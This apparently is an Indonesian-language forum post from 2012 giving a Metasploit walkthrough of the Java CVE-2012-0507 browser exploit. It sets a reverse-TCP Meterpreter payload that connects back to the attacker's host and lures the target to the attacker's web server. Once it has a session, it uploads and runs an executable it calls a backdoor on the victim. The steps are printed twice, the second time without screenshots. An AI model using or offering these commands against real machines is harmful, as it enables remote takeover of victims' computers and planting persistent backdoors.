11-01-2012, 12:57 PM
target harus sudah intall java 6
1 buka terminal dan ketikkan msfconsole
2. gunakan exploit use exploit/multi/browser/java_atomicreferencearray
![[Image: using_Java_CVE-2012-0507.jpg]](https://2.bp.blogspot.com/-kriAs4s4pXE/T6_cKoKYMpI/AAAAAAAAAzA/zmJMAW3O6nw/s1600/using_Java_CVE-2012-0507.jpg)
3.aur srvport dan uripath"set SRVPORT 80".
"set URIPATH /".
![[Image: settings_srvport.jpg]](https://2.bp.blogspot.com/-Gcx3ck-meSc/T6_cI6toCTI/AAAAAAAAAy4/eSc9WEC0rb8/s1600/settings_srvport.jpg)
4.gunakan payload "set payload java/meterpreter/reverse_tcp"
![[Image: Set_Payload.jpg]](https://3.bp.blogspot.com/-goqCSp0p51M/T6_b3CAxIfI/AAAAAAAAAyQ/rhNTL8eeDeU/s1600/Set_Payload.jpg)
5. atur lhost ip anda set LHOST [IP_address]
contoh set LHOST 192.168.56.10"
![[Image: set_LHOST.jpg]](https://4.bp.blogspot.com/-Di7UxgjOyA0/T6_cG_UGKgI/AAAAAAAAAyw/JOJz2cM1DXg/s1600/set_LHOST.jpg)
6. exploit
![[Image: Exploiting_Metasploit.jpg]](https://4.bp.blogspot.com/-7nKVLn1zcH0/T6_bkvRqtgI/AAAAAAAAAyA/Sr2mT2OKfss/s1600/Exploiting_Metasploit.jpg)
7.buka mesin target dan masukkan http://192.168.56.10
![[Image: Target-machine-connects.jpg]](https://4.bp.blogspot.com/-lJeR7iM5VuQ/T6_b9mZ-uII/AAAAAAAAAyg/qpkGQS5C4Tk/s1600/Target-machine-connects.jpg)
8. dan liat hasilnya
![[Image: session_meterpreter.jpg]](https://1.bp.blogspot.com/-eE6FlmQnbnM/T6_cCBciWQI/AAAAAAAAAyo/VDMhLt2H4cQ/s1600/session_meterpreter.jpg)
![[Image: Meterpreter.jpg]](https://4.bp.blogspot.com/-j3hgaUcAn7M/T6_b0vswzlI/AAAAAAAAAyI/gd5tNDvPt1A/s1600/Meterpreter.jpg)
buat backdoor di korban ketika masuk mode meterpreter
''upload /Test.exe c:\\"
lalu eksekusi
execute -f C:\\Test.exe
![[Image: Executing_RAT.jpg]](https://3.bp.blogspot.com/-ID1QCdLlDBw/T6_bhv2mcdI/AAAAAAAAAx4/cuRSHf-C2AQ/s1600/Executing_RAT.jpg)
1 buka terminal dan ketikkan msfconsole
2. gunakan exploit use exploit/multi/browser/java_atomicreferencearray
3.aur srvport dan uripath"set SRVPORT 80".
"set URIPATH /".
4.gunakan payload "set payload java/meterpreter/reverse_tcp"
5. atur lhost ip anda set LHOST [IP_address]
contoh set LHOST 192.168.56.10"
6. exploit
7.buka mesin target dan masukkan http://192.168.56.10
8. dan liat hasilnya
buat backdoor di korban ketika masuk mode meterpreter
''upload /Test.exe c:\\"
lalu eksekusi
execute -f C:\\Test.exe